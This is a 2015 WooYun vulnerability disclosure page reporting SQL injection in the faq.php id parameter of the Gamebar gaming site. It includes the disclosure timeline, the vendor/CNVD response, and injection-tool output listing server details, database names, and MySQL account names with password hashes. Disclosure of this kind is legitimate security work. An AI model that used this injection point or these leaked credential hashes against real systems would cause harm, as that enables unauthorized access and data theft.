当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134092

漏洞标题:游戏吧:GAMEBAR SQL Injection

相关厂商:北京网元圣唐娱乐科技有限公司

漏洞作者: 路人甲

提交时间:2015-08-17 16:55

修复时间:2015-10-03 18:50

公开时间:2015-10-03 18:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

RT 你们又会忽略?

详细说明:

http://**.**.**.**/faq.php?id=1

Target: 		http://**.**.**.**/faq.php?id=1
Host IP: **.**.**.**
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.0
Powered-by: PHP/5.3.0
DB Server: MySQL >=5
Resp. Time(avg): 40 ms
Current User: root@**.**.**.**
Sql Version: 5.1.66-log
Current DB: Gamebar_CS1V1
System User: root@**.**.**.**
Host Name: localhost.localdomain
Installation dir: /usr/local/mysql-5.1.66-linux-x86_64-glibc23/
DB User & Pass: root:*277DD46004D844BF4A57751096BAF5DA477A6520:localhost
root:*277DD46004D844BF4A57751096BAF5DA477A6520:192.168.%
dealer:*FF7C8796582BF11C33AA449A84F59E564CAD8648:localhost
rep:*9FF2C222F44C7BBA5CC7E3BE8573AA4E1776278C:192.168.%
slave:*51125B3597BEE0FC43E0BCBFEE002EF8641B44CF:192.168.%
ssh_back:*A49E12C660FB10E07C0BE947E104B353DCAC88B8:192.168.%
ssh_back:*A49E12C660FB10E07C0BE947E104B353DCAC88B8:localhost
root:*277DD46004D844BF4A57751096BAF5DA477A6520:**.**.**.**
app_read:*2DF6B6AAF899F3D6E63CF50E65A6942F20F6F6C9:192.168.%
wangyb:*DC9D64C03C50E04FBB085B3F47D49DE7DE0E339F:**.**.**.**
app_write:*0E63DA86C7EE9E049B497821703503AD0D077423:192.168.%
Data Bases: information_schema
Gamebar_CS1V1
Gamebar_dealer_new
mysql
test


1.png

漏洞证明:

综上

修复方案:

你会的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-08-19 18:49

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无